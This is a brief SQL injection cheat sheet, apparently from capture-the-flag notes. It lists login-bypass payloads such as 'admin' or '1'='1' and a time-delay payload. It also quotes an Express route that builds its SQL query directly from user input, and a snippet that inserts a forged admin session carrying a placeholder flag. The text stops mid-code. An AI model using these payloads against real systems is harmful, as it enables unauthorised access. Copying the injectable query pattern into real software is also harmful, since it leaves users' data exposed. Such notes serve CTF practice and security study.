SQL Cheat
Bypass Login
admin' --
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'/*
admin') or ('1'='1
' waitfor delay '0:0:20' --WAF
SQL in App (Not DB)
Sessions Cookies
app.get("/searchcookies", isAuthenticated, async (req, res, next) => {
cookies = req.query.cookies;
const query = `SELECT * FROM cookies WHERE flavor = "${cookies}"`;
pool.query(query, (err, result) => {
if(err){
return next(err)
}
return res.status(200).render("index", {cookies: result || []})
});
})
try {
const adminCookieData = {"cookie":{"originalMaxAge":86400000,"expires":"2024-04-20T19:21:29.400Z","httpOnly":true,"path":"/", "sameSite": "lax"},"username":"Admin","isAdmin":true};
const sessionId = 'WSUCTF{F4ke_Flag}';
const expirationTimestamp = 1712172179;
const serializedData = JSON.stringify(adminCookieData);
const query = `INSERT INTO sessions (session_id, data, expires) VALUES (?, ?, ?)`;App/File
Last updated